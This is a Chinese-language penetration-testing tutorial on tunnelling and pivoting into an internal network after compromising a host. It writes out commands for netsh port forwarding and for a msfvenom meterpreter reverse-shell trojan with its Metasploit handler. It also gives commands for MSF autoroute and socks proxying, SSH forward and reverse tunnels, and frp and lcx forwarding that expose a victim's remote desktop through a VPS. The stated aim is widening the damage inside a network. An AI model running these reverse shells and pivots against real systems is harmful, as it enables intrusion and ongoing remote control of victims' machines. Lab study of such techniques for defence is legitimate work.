隧道

当我们入侵到内网中拿下一台主机时,为了扩大危害范围,通常会对内网中存活的主机进行扫描,但是扫描到的机器因为与我们网段不同无法通信,这时就需要通过可以通内外网的多网卡的机器来当作跳板进入到内网中,打开进入目标内网的隧道

目录

windows端口转发

实验环境

攻击机(kali)==》跳板机(win2008)==》受害机(win2012)

利用windows自带的netsh端口映射

跳板机

跳板机添加转发规则

当其他机器访问本机的指定端口时转发到受害机的指定端口

netsh interface portproxy add v4tov4 listenport=(跳板机端口) connectaddress=(受害机端口) connectport=(受害机ip)

查看规则

netsh interface portproxy show all 

这时我们能够访问跳板机的机器也同时能访问受害机了

攻击机

生成windows反向连接小马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(跳板机内网ip)LPORT=(跳板机端口) -f exe > shell.exe

开启msf控制台

msfconsole

使用监听模块

use exploit/multi/handler

设置监听模式

set payload windows/meterpreter/reverse_tcp

设置本机监听地址

set lhost (攻击机 IP)

设置本机监听端口

set lport (攻击机 端口)

运行

run

受害机

运行木马

因为攻击机与受害机网段不同,所以受害机无法反向连接攻击机,所以利用跳板机做流量转发来建立连接,现在攻击机通过监听自己的端口就能控制受害机了

MSF隧道建立与BP抓包

当想要抓其内网机器数据包时,因为与内网机器不相通,所以需要打通隧道来达到目的

实验环境

BP机(win10)==》攻击机(kali)==》跳板机(win2008)==》受害机(win2012)

msf隧道建立

通过上面的步骤我们已经能让受害机通过MSF在攻击机上面上线了

进入MSF的监听成功的视图

run autoroute

run autoroute -s 12.12.12.0/24//添加路由

run autoroute -p //查看路由

bg//在后台挂起会话

route add (受害机网段) (受害机子网掩码) (session会话序号)//添加路由

route print//查看路由

use auxiliary/server/socks_proxy//使用socks代理模块

run //使用默认配置运行就可以了

编辑proxychains的配置文件,这里我们用socks5版本和1080端口,修改最后一行

vim /etc/proxychains4.conf ====>> socks5 (kali IP) 1080
proxychains namp -sT (受害机ip)    //使用namp测试连接

proxychains firefox (受害机网站) //使用firefox测试连接

BP抓包(基于msf隧道建立)

BP机安装SocksCap

使用SocksCap代理工具将攻击机设置为全局代理

修改BP的user options 设置 upstream proxy server添加

destination host为* //允许所有连接

proxy host为127.0.0.1

proxy post为(sockscap的默认端口)25378

msf的端口转发工具

msf也有自带的端口转发可以用

实验环境

BP机(win10)==》攻击机(kali)==》跳板机(win2008)==》受害机(win2012)

先从攻击机用msf连接到跳板机并开启其开启远程桌面

然后在MSF的监听成功的视图为跳板机开启端口转发

portfwd add -L (本机ip) -l (本机端口) -p (目标机端口) -r (目标机ip)

现在在攻击机就能远程连接到受害机的远程桌面了

rdesktop (目标机ip):(目标机端口)

SSH隧道

实验环境

kali(攻击机)==》ubuntu(跳板机)==》win2012(受害机)

正向连接

攻击机

ssh远程连接

ssh -L (本地端口):(受害机ip):(受害机端口) (跳板机账户)@(跳板机ip)

反向连接

跳板机

编辑ssh配置文件

vim /etc/ssh/sshd_config

在port下面添加GatewayPorts yes

ssh -R 本地端口:(受害机ip):(受害机端口) (跳板机账户)@(跳板机外网ip)

Frp

实验环境

kali(攻击机)==》ubuntu(VPS)==》win2012(受害机)

VPS

 ./frps -c frps.ini //运行服务端

受害机

配置frpc.ini

[common]

server_addr = (VPS的ip) server_port = (VPS frps.ini的端口)

[(随便起个名 3389)]

type = tcp

local_ip = 127.0.0.1

local_port = (客户端开放的端口 3389) remote_port = (让VPS开放的端口 6000)

frpc //运行客户端

攻击机

rdesktop (VPS ip):6000 //远程桌面连接到受害机

LCX

实验环境

ubuntu==》win10

ubuntu

make //编译
./lcx - listen 4444 5555 //当5555端口被访问时转发到4444端口

win10

lcx.exe -slave (ubuntu ip) 4444 127.0.0.1 80 //接收ubuntu4444端口流量到本机80

ubuntu

访问127.0.0.1:5555 //相当于访问win10的80端口